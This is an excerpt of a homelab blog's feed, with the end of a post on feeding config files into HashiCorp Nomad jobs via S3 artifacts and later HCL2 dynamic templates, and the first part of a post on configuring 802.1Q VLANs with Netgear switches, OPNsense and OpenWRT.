<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;docs&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;example&#34;</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;server&#34;</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">artifact</span> {
</span></span><span style="display:flex;"><span>        source      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://example.com/file.tar.gz&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/some-directory&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">options</span> {
</span></span><span style="display:flex;"><span>          checksum <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;md5:df6a4178aec9fbdc1d6d7e3634d1bc33&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>It makes use of the <a href="https://github.com/hashicorp/go-getter">go-getter</a> lib,
also by HashiCorp. It supports a lot of different source types in its
<code>source</code> option, including HTTP, Git and S3. What it cannot do, when used in
Nomad, is access arbitrary files on the Nomad host. This is obviously for security
reasons, but it is also very restricting.</p>
<p>So my only way to get config files into the service&rsquo;s containers was to provide
them through the <code>artifact</code> stanza.</p>
<p>Now, if I were a GitOps kind of guy, this would be simple. I could
use the artifact stanza to check out a Git repository with the service configs
and do the following when working on a service config change:</p>
<ol>
<li>Commit the potential change into the repo locally</li>
<li>Push the commit to my Gitea instance</li>
<li>Update the Nomad job on my machine with <code>nomad job run</code></li>
<li>See that the job fails due to an error in the config file</li>
<li>Make another change. Either create a new commit, probably called &ldquo;Attempt 1&rdquo;,
or do a force push</li>
<li>Launch the job again</li>
<li>See it fail again</li>
<li>Make another change. Either create a new commit, probably called &ldquo;Attempt 2&rdquo;,
or do a force push</li>
<li>&hellip;</li>
</ol>
<p>I hope you can see the problem already. If not, allow me to compliment your
patience.</p>
<p>But that&rsquo;s a relatively minor problem. The major problem with this approach:
Neither my Gitea instance nor its dependencies, Postgres and Redis, could run
on the cluster anymore. Because for Nomad to get Gitea&rsquo;s config file, it needs
to access the Gitea instance - a classic chicken-and-egg problem.</p>
<p>So to spell out my goal: I wanted to be able to have a single Git repo somewhere,
with both the service configs and the Nomad job specs. And I wanted to be able to
make a change on disk and then, without committing or pushing or anything else,
I wanted to be able to run <code>nomad job run</code> and have the local state of files be
reflected in the newly started job.</p>
<p>I also wanted some way to not have to specify every single service config file
in the Nomad job spec. I wanted to be able to just say: Here is an entire
directory of configs, make them all available to the job.</p>
<p>So what I ended up doing was to acquire a goat. And an ancient dagger from a very
old friend. And then I went onto a misty hilltop and summoned the following
eldritch horror forth from the Warp.</p>
<h2 id="how-to-use-s3-as-a-filesystem">How to use S3 as a filesystem</h2>
<p>You have been warned.</p>
<p>From the Nomad side, I ended up using the <code>artifact</code> stanza with S3. I&rsquo;ve already
got S3 available via my Ceph cluster, and that Ceph cluster is considered to be
one layer below my Nomad cluster in the stack - meaning the Ceph cluster works
and bootstraps without needing anything from the Nomad cluster or any services
running on it.</p>
<p>So in my jobs, handling the service configs looked something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;foo&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;foo:1.0&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/artifact_dl/config&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/etc/foo&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">artifact</span> {
</span></span><span style="display:flex;"><span>        source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;s3::https://example.com:4711/configs/foo/&#34;</span>
</span></span><span style="display:flex;"><span>        mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dir&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/artifact_dl/&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">options</span> {
</span></span><span style="display:flex;"><span>          region <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;homenet&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/artifact_dl/templates/foobar.conf.templ&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/artifact_dl/config/foobar.conf&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;644&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>This means that Nomad will download the <code>foo/</code> directory in the <code>configs/</code> bucket
and put its contents into <code>local/artifact_dl/</code>. That directory would look like
this in my config git repository:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>config
</span></span><span style="display:flex;"><span>|- foo
</span></span><span style="display:flex;"><span>|  |- config/
</span></span><span style="display:flex;"><span>|  |  |- bar.conf
</span></span><span style="display:flex;"><span>|  |  |- baz.conf
</span></span><span style="display:flex;"><span>|  |- templates
</span></span><span style="display:flex;"><span>|  |  |- foobar.conf.templ
</span></span><span style="display:flex;"><span>|  |- nomad
</span></span><span style="display:flex;"><span>|  |  |- foo.hcl
</span></span></code></pre></div><p>So I would have all my files for a particular job in a separate directory. And
only that subdirectory would be made available to the job during startup.</p>
<p>Now the last problem: How to get the automatic sync between my local working
copy and the S3 bucket? The answer is <a href="https://github.com/s3fs-fuse/s3fs-fuse">s3fs</a>.
A FUSE tool to mount S3 as a POSIX(ish) filesystem. So on my desktop, I would
run the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3fs -o passwd_file<span style="color:#f92672">=</span>/file/with/pw -o url<span style="color:#f92672">=</span>https://example.com:4711 -o use_path_request_style -o use_cache<span style="color:#f92672">=</span>/tmp/s3fs -o enable_noobj_cache -o multireq_max<span style="color:#f92672">=</span><span style="color:#ae81ff">500</span> -o parallel_count<span style="color:#f92672">=</span><span style="color:#ae81ff">50</span> configs /local/mount/path
</span></span></code></pre></div><p>And then I&rsquo;ve got the S3 bucket&rsquo;s content available locally. And you can even
work with Git on this S3 backed filesystem.</p>
<p>A short aside for other Ceph users. Ceph is able to provide an NFS filesystem
backed by an S3 bucket. This sounds like a way better solution, but it sadly
does not work. This S3 backed NFS provider does not support all FS operations,
it seems. Running <code>git status</code> on a Git repo on such a mounted NFS returns
&ldquo;not implemented&rdquo; errors.</p>
<p>When making local changes, I can then just run <code>nomad job run</code> and get the newly
started job to use the locally changed files - because they were synced back to
the S3 bucket.</p>
<p>There are a number of problems with this approach. First, performance. Normal FS
operations are okayish, but Git does a lot of FS operations. Even just a <code>git status</code>
takes a couple of seconds to complete, and the repo isn&rsquo;t that big. Even opening
files has a perceivable delay.
Then, note that I wrote above how I would get the changed config files in a
<em>newly started job</em>. When running <code>nomad job run</code>, Nomad only checks whether the
job spec itself has changed to determine whether it needs to update the job.</p>
<p>You can work around that with the <code>nomad alloc stop</code> command. Interestingly, that
command doesn&rsquo;t really <em>stop</em> anything - it&rsquo;s more of a <code>stop and then start again</code>
operation. And that operation also downloads the artifacts again.</p>
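<p>Roughly, the workaround looks like this (job name and allocation ID are
placeholders for illustration):</p>
<pre tabindex="0"><code># Find the running allocation(s) of the job.
nomad job status foo

# Stop one of them; the scheduler immediately starts a replacement,
# which re-downloads the artifact and thus picks up the changed configs.
nomad alloc stop ALLOC_ID
</code></pre>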
<p>But hopefully, you can see that this is a crutch.</p>
<h2 id="doing-it-better">Doing it better</h2>
<p>To get rid of this entire setup, I changed my tool to make use of the <code>nomad</code>
binary to convert HCL job files to JSON files for use by the Nomad API.</p>
<p>This allows me to change the above Nomad file example into something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;foo&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;foo:1.0&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/artifact_dl/config&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/etc/foo&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">dynamic</span> <span style="color:#e6db74">&#34;template&#34;</span> {
</span></span><span style="display:flex;"><span>        for_each <span style="color:#f92672">=</span> <span style="color:#66d9ef">fileset</span>(<span style="color:#e6db74">&#34;.&#34;, &#34;foo/config/*&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">content</span> {
</span></span><span style="display:flex;"><span>          data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#66d9ef">template</span>.<span style="color:#66d9ef">value</span>)
</span></span><span style="display:flex;"><span>          destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/config/${basename(template.value)}&#34;</span>
</span></span><span style="display:flex;"><span>          change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;foo/templates/foobar.conf.templ&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/config/foobar.conf&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;644&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>And there we are. The <code>dynamic</code> keyword is part of HCL2, the second version of
HashiCorp&rsquo;s HCL language. It dynamically creates stanzas. In this case,
the above <code>dynamic</code> stanza is equivalent to:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>  data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;foo/config/bar.conf&#34;</span>)
</span></span><span style="display:flex;"><span>  destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/config/${basename(/foo/config/bar.conf)}&#34;</span>
</span></span><span style="display:flex;"><span>  change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>  data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;foo/config/baz.conf&#34;</span>)
</span></span><span style="display:flex;"><span>  destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/config/${basename(/foo/config/baz.conf)}&#34;</span>
</span></span><span style="display:flex;"><span>  change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The <code>fileset</code> function just expands to a list of all files matching the glob in
its argument, in this case all files in <code>./foo/config</code>.</p>
<p>The <code>file</code> function just loads a file&rsquo;s content. In this case, that content
is loaded into the <code>data</code> parameter of the template stanzas, turning them into inline
template definitions - only that the content comes from a file on the local disk, on the
operator machine, instead of from the Nomad client filesystem during job startup.</p>
<p>Which is exactly what I needed: I can now send the job spec and all service
config files off to Nomad for execution as one package. And because the config
files are now part of the job spec from Nomad&rsquo;s PoV, the job is automatically
restarted whenever I update a config file.</p>
<p>There is one potential catch with this: I have read <em>somewhere</em>, a long while
ago, that there is a size limit to how large a transmitted job spec can be. I
can&rsquo;t find the bug report/documentation right now, but I seem to remember that
it was done to prevent Denial of Service attacks by sending overly large
job specs. My largest config currently is my Fluentd config, spread over a
number of files. It didn&rsquo;t result in any problem, so for now I seem to be safe.</p>
<p>My next steps:</p>
<ul>
<li>Migrating all of my jobs to use the new approach of using <code>file</code> for config
file management</li>
<li>Merging the services repository into my main homelab repo</li>
</ul>
<p>And the final step: Taking aforementioned ancient dagger and sending this
wandering S3 horror back whence it came.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Implementing VLANs in my Homelab: It&#39;s all fun and games until the trunk port arrives</title>
      <link>https://blog.mei-home.net/posts/vlans/</link>
      <pubDate>Tue, 10 Jan 2023 00:12:10 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/vlans/</guid>
      <description>Switching from a flat network to one segmented via VLANs using OPNsense and Netgear Smart Managed Switches</description>
<content:encoded><![CDATA[<p>It took me quite a while to finally get VLANs. In fact, it took me until about
the middle of the migration to understand them. No idea why, because once I
did understand them, they made a lot of sense.</p>
<p>In this post, I will be going over my journey from a network with two subnets,
the DMZ and everything else, to a more segmented setup with multiple VLANs.</p>
<p>As the OS and switch HW used plays a significant role, here&rsquo;s my networking
equipment:</p>
<ol>
<li>I have two switches, both of them Netgear &ldquo;Smart Managed&rdquo; units. These are
Netgear&rsquo;s prosumer/SOHO units. They don&rsquo;t have as many options (and aren&rsquo;t
as expensive) as the fully managed enterprise offerings, but they also aren&rsquo;t
dumb switches. Important for this topic is merely that both of them support
<em>802.1Q</em> type tagged VLANs. Specifically, I have these two:
<ul>
<li><a href="https://www.netgear.com/se/business/wired/switches/plus/gs108e/">GS108E</a></li>
<li><a href="https://www.netgear.com/se/business/wired/switches/plus/gs116ev2/">GS116Ev2</a></li>
</ul>
</li>
<li>My Firewall/Router is a 6-port, Intel mobile CPU unit: <a href="https://www.ipu-system.de/produkte/ipu672.html">this one</a>.
Sorry, the website seems to be in German only. It is running <a href="https://opnsense.org/">OPNsense</a>.</li>
<li>My WiFi AP is a <a href="https://www.tp-link.com/en/home-networking/wifi-router/archer-c7/">TP Link Archer C7</a>
running <a href="https://openwrt.org/">OpenWRT</a>.</li>
</ol>
<p>As I somehow took a while to wrap my head around VLANs and what their advantage
over subnetting is, I will not just keep this post to the &ldquo;Here is what I ended
up with&rdquo; style, but take you on the same journey I went on, including the things
which went wrong on the day of the switchover.</p>
<p>I will be going into both how VLANs work in principle and how I applied them
with my particular hardware.</p>
<p>Enough intro, let&rsquo;s start out with what a VLAN is. &#x1f604;</p>
<h1 id="8021q-vlans">802.1Q VLANs</h1>
<p>There are several potential types of VLANs. The older kind is the <em>port based
VLAN</em>, which was rather vendor-specific. Then followed the <em>Tagged VLAN</em>, again
pretty vendor specific. These tagged VLANs later got standardized as <a href="https://en.wikipedia.org/wiki/IEEE_802.1Q">IEEE 802.1Q</a>.</p>
<p>For the rest of this post, I will <strong>only</strong> talk about 802.1Q VLANs.</p>
<p>I&rsquo;m going to keep the <em>theoretical</em> part pretty short here. Suffice it to say
that in tagged VLANs, each packet&rsquo;s header does not just carry the typical MAC
address and so forth, but also a VLAN ID, between 1 and 4094. This VLAN ID can
be interpreted by both network equipment like switches and operating systems
on end-user equipment. Both Linux and BSD support them in their networking stack.</p>
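<p>As a quick illustration of the host side on Linux (interface names and
addresses are just examples): a VLAN shows up as its own network device on top
of the physical NIC.</p>
<pre tabindex="0"><code># Create a VLAN device with ID 86 on top of eth0. Packets sent through
# eth0.86 leave eth0 tagged with VLAN ID 86.
ip link add link eth0 name eth0.86 type vlan id 86
ip addr add 10.86.86.10/24 dev eth0.86
ip link set dev eth0.86 up
</code></pre>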
<p>And now on to what threw my understanding of VLANs: How are packets treated under
different scenarios? What happens when they enter a switch and leave it again?
What ports can they leave through? What about ports which connect switches with
each other?</p>
<p>Somehow, all the articles seemed to leave out something important. I&rsquo;m hoping
to prevent you from having to read two dozen articles before you get it - or
at least make this the last one you need. &#x1f609;</p>
<h2 id="switches">Switches</h2>
<p>In 802.1Q, a port has three important pieces of configuration attached to it:</p>
<ol>
<li>The VLANs (there can be multiple!) it is a member of</li>
<li>The port&rsquo;s tagged/untagged status per VLAN</li>
<li>The port&rsquo;s PVID, or default VLAN</li>
</ol>
<p>All three pieces of config play a part in deciding what happens to a packet
which either enters the switch through the port, or leaves it through it.</p>
<h3 id="entering-the-switch-through-a-port">Entering the switch through a port</h3>
<p>Here, the two configs &ldquo;member VLANs&rdquo; and &ldquo;PVID&rdquo; are relevant. The third config,
tagged/untagged, is <em>only</em> relevant when a packet leaves the switch through
that port.</p>
<p>In 802.1Q switches, the <em>PVID</em> denotes the default VLAN ID for packets which
enter through this port. This default VLAN ID is only applied if the entering
packet does not have any VLAN ID attached yet. There can only ever be one
default port VLAN ID per switch port (at least in more basic switches).</p>
<p>If the entering packet already has a VLAN ID, one of two things will happen:</p>
<ol>
<li>If the port through which the packet enters is a member of the VLAN which is
denoted in the VLAN ID of the packet, the packet is allowed to enter the
switch, and leave it again through any other port which is also a member of
that VLAN ID.</li>
<li>If the packet&rsquo;s VLAN ID does not fit any of the port&rsquo;s member VLANs,
the packet will simply be dropped.</li>
</ol>
<p>As a consequence of the above rules, the PVID of a port must match one of the
VLANs it is a member of.</p>
<p>So in short: If the entering packet is untagged, it will get the default VLAN
ID of the port it enters through. If it is tagged, it will be dropped if its
tag does not match any of the port&rsquo;s VLANs. Otherwise, it is allowed to enter
the switch.</p>
<h3 id="leaving-the-switch-through-a-port">Leaving the switch through a port</h3>
<p>So then on to what happens with a packet when it leaves the switch through a
port. First, for the packet to be able to leave the switch through a given port,
that port needs to be a member of the VLAN in the packet&rsquo;s VLAN header.
If that is the case, the tagged/untagged configuration comes into play. This is
the <em>only</em> time when this config plays a role. This config specifically doesn&rsquo;t
play any role at all for packets <em>entering</em> the switch through any given port.</p>
<p>When a packet leaves the switch through a <em>tagged</em> port, the packet&rsquo;s VLAN ID
is left untouched, and the packet will arrive at the other end of the network
cable still carrying the VLAN tag. This will confuse systems which don&rsquo;t know
about VLANs.</p>
<p>Note that a packet which leaves a switch always has a VLAN tag attached when
it arrives at the departure port, as a packet inside an 802.1Q switch is always
tagged.</p>
<p>If the port a packet leaves the switch through is <em>untagged</em>, the VLAN ID is
stripped out of the packet. This should be the default config for all ports,
unless the other end of the network cable is supposed to handle VLANs.</p>
<p>To reiterate: A packet leaving the switch can either be tagged or untagged,
depending on the config of the port it is leaving through.</p>
<h3 id="what-it-all-looks-like-on-netgear-smart-managed-plus-switches">What it all looks like on Netgear Smart Managed Plus switches</h3>
<p>Here are a couple of screenshots from Netgear&rsquo;s web UI for configuring VLANs.</p>
<p>Here&rsquo;s the one to just switch VLANs on or off:</p>
<figure>
    <img loading="lazy" src="netgear_enable_vlans.png"
         alt="A website screenshot of the Netgear web UI. On the left side, there is a menu. The advanced -&gt; VLAN Configuration entry is highlighted. To the right, the heading reads Advanced 802.1Q VLAN configuration. Below it is a two-state radio button. The label reads Advanced 802.1Q VLAN. The two states read Disable and Enable. The Enable state is chosen in the screenshot."/> 
</figure>

<p>After the VLAN functionality has been enabled, VLANs can be added on the same page.
While the VLAN membership for each port is also shown, it can not be configured
on this page.</p>
<figure>
    <img loading="lazy" src="netgear_vlan_identifier.png"
         alt="A screenshot of Netgears Web UI. It shows a heading reading VLAN Identifier Setting. On the right, there is a field with the label VLAN ID, with the value 100. Below is a table with three columns. The first one consists of checkboxes and does not have a header. The second one is headed VLAN ID. The only visible table row has the value 01. The next column has the header Port Members and the values 01 and 03 in the first row."/> 
</figure>

<p>In this screenshot, the input box in the upper right corner is the input for a
new VLAN, here with the VLAN ID &ldquo;100&rdquo;. The checkboxes in the first column are
for selecting a VLAN to be deleted.</p>
<figure>
    <img loading="lazy" src="netgear_vlan_membership.png"
         alt="A screenshot of Netgears Web UI. On the left side, a menu is shown with the entry Advanced -&gt; VLAN Membership highlighted. On the right side, the heading reads VLAN Membership as well. Below it, a drop-down with the label VLAN ID has the value 100. Another drop-down, with the label Group Operation has no value. Below the drop-down, a stylized row of 16 Ethernet ports is shown, numbered one through 16. Port 1 has the letter U on it. So does Port 6. Port 12 has the letter T on it."/> 
</figure>

<p>The above screenshot shows the VLAN membership configuration. In the VLAN ID
drop-down, the VLAN ID to be configured can be chosen. Then, clicking on any of
the port icons will iterate through three values:</p>
<ol>
<li>None: All ports in the screenshot besides 1, 6, 12. This state means that the
port is not a member of VLAN 100. No packets with that VLAN can enter or
leave the switch through those ports.</li>
<li>U: This means the port is an untagged member. Ports 1 and 6 are examples. When
a packet leaves the switch through either of these ports, its VLAN tag will
be stripped out. If a packet with VLAN ID 100 enters through the port, it will
be forwarded normally.</li>
<li>T: This is a tagged port, with 12 being the only example in this screenshot.
Any packet with this VLAN ID entering the switch through port 12 will be
forwarded as normal. Any packet leaving the switch through the port will
retain its VLAN ID.</li>
</ol>
<p>The untagged VLAN membership is generally advised for endpoints, while tagged
ports are normally used for uplinks to other switches or routers.</p>
<figure>
    <img loading="lazy" src="netgear_vlan_pvid.png"
         alt="A screenshot of Netgears Web UI. On the left, a menu is visible with the Advanced -&gt; Port PVID entry highlighted. On the right, the heading reads PVID Configuration. Below it is a table with three columns. The first one has no header and consists only of checkboxes. The checkbox in the first row is marked. The second column shows the heading Port and shows the value 1 in the first row. The last column has the header PVID and shows an entry field in an extra row below the heading. The value in that entry field is 86. The value in the first row is also 86."/> 
</figure>

<p>Finally, the above screen allows the configuration of the default port VLAN ID.
There can only ever be one default VLAN ID, which is assigned to all untagged
packets entering the port.</p>
<h2 id="opnsense">OPNsense</h2>
<p>Next part is my router/firewall, a 6-port unit running OPNsense, a FreeBSD based
OS.</p>
<p>On hosts, the configuration of VLANs works a little bit differently. Both on Linux
and BSD, each VLAN becomes a new network device. The kernel then accepts all
packets from the NIC and hands each packet to the device with the matching
VLAN ID, or drops the packet if it doesn&rsquo;t fit anything.</p>
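<p>Under the hood, this is roughly what gets set up on FreeBSD when such a VLAN
device is created - a sketch using the <code>igb0</code> parent and VLAN 86 from my setup:</p>
<pre tabindex="0"><code># Create a VLAN device for VLAN 86 on top of igb0 and give it the
# address the firewall should have in that VLAN.
ifconfig vlan86 create vlan 86 vlandev igb0
ifconfig vlan86 inet 10.86.86.254/24 up
</code></pre>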
<p>In OPNsense, devices can be <em>stacked</em>, and the configuration for devices (like
firewall rules, DHCP configs etc) can be attached to virtual devices, with OPNsense
making sure that the right service instances listen to the right device.</p>
<p>The first step in creating a VLAN in OPNsense is under <em>Interfaces</em> -&gt; <em>Other Types</em>
-&gt; <em>VLAN</em>.</p>
<figure>
    <img loading="lazy" src="opnsense_vlan.png"
         alt="A screenshot of the OPNsense Web UI. On the left side, a menu is visible, with the entry Interfaces -&gt; Other Types -&gt; VLAN highlighted. On the right is a table. The first column has checkboxes, none of which are selected. There is only one row of data visible. In the second column headed Device, the value reads vlan01 [VLANGeneralLAN]. The third column has the heading Parent, with the value igb0 followed by a MAC address followed by [LAN]. The fourth column is headed Tag and has the value 86 in the first row. The next column is headed PCP with the value Best Effort (0,default). The next column has the heading Description with the value General VLAN on LAN interface. The last column, headed Commands, holds a couple of buttons."/> 
</figure>

<p>I&rsquo;ve cut out most of my VLANs. The one VLAN visible, with VLAN ID 86, is my general
VLAN for anything which only gets access to the internet and the DMZ and nothing else.</p>
<p>When adding a new VLAN here, a parent interface has to be defined. This parent
is the interface from which packets are forwarded to the VLAN interface by the
kernel. An interface can have multiple VLAN interfaces attached to it. This
even works with VLAN interfaces as parents, which is called <em>QinQ</em>.</p>
<p>These VLAN interfaces cannot be used directly in OPNsense, e.g. to create
firewall rules. Instead, an OPNsense interface based on them needs to be defined.</p>
<figure>
    <img loading="lazy" src="opnsense_interface_assignment.png"
         alt="A screenshot of the OPNsense Web UI. On the left, a menu with the entry Interface -&gt; Assignments being highlighted is visible. On the right, a drop-down besides the Label VLANGeneralLAN is visible, with the entry vlan01 GeneralVLAN on LAN interface (Parent:igb0, Tag:86) is shown."/> 
</figure>

<p>On this screen, an interface is assigned to a device. Interfaces are the entities
to which configs can be assigned, e.g. as listening interfaces for DNS servers,
as containers for firewall rules etc.</p>
<p>Once the assignment is done here, the interface needs to be further configured.
Most importantly, it needs to receive an IP if the firewall is supposed to be
reachable from that interface/VLAN.</p>
<figure>
    <img loading="lazy" src="opnsense_interface_conf.png"
         alt="Another screenshot of the OPNsense Web UI. On the left, the menu item Interfaces -&gt; VLANGeneralLAN is selected. On the right, the config option Static IPv4 is chosen in the field labeled IPv4 Configuration Type. The field IPv4 address has the value 10.86.86.254."/> 
</figure>

<p>In my configuration, each VLAN gets the subnet corresponding to the VLAN ID
as the third byte, so in the case of my VLAN 86, the subnet is <code>10.86.86.0/24</code>.</p>
<p>With that, OPNsense is fully configured to receive packets on <code>igb0</code>, which is
the device configured as the parent of VLAN 86. The rest of the configuration
is the same as for other types of interfaces. DHCP, DNS, firewall rules etc. can
be set up now.</p>
<h2 id="openwrt">OpenWRT</h2>
<p>The final explainer will be on OpenWRT, which I&rsquo;m using as the OS for my WiFi
AP. Here, we&rsquo;ve got the interesting case of a device which combines both of the
previous VLAN config approaches: It contains a 4-port Ethernet switch, but also
gets VLAN devices via the kernel.</p>
<p>In the default configuration, OpenWRT already has VLANs enabled, with different
VLAN IDs for the LAN and WAN zones.</p>
<p>The OpenWRT VLAN config can be found in the <em>Network</em> -&gt; <em>Switch</em> menu.</p>
<figure>
    <img loading="lazy" src="openwrt_switch.png"
         alt="A screenshot of the OpenWRT Web UI. Under the heading VLANs on switch0, there are six ports displayed. The first one is called CPU(eth0), followed by LAN 1 through LAN 4. The final port is headed WAN. In a table below it are three VLANs with IDs 1,2 and 86. The CPU port has the value tagged on all of the VLANs. Port LAN 1 has value untagged on VLAN 1, off on VLAN 2 and tagged on VLAN 86. The other ports are not important here."/> 
</figure>

<p>One important and initially confusing point is the <code>CPU(eth0)</code> port here. This
port represents the connection to the AP&rsquo;s CPU, which simply means that all
packets arriving here are handed to OpenWRT&rsquo;s Linux kernel and the configured
VLAN devices. You can imagine that the AP is really a 6-port switch, with the
AP&rsquo;s controller plugged into the first port.</p>
<p>As per the configuration shown above, all of my VLANs are forwarded tagged into
the kernel. This means that there need to be NIC devices configured to accept
those packets in the kernel. I will get to those in a moment.</p>
<p>Only the LAN 1 port is connected in my setup. The WiFis are not considered here;
I will get to them in a bit. Port 1 forwards VLAN 1 untagged. This is my
admin VLAN. I left it untagged during the configuration to avoid losing access
to the AP if I misconfigure something. VLAN 2 is completely unused here. It is
part of the default setup, used by WAN traffic if OpenWRT is also used as a
router. As I&rsquo;m only using it as a WiFi AP, it doesn&rsquo;t play any role here.
VLAN 86, which is my general VLAN with access to very little, is forwarded tagged,
so that at my upstream switch, it can only go to my firewall, where it can then
only be routed to my DMZ or the internet.</p>
<p>The next step in configuring VLAN use for the WiFis is to create a VLAN device
for VLAN 86, very similar to the first step in configuring the VLAN on the
OPNsense firewall.
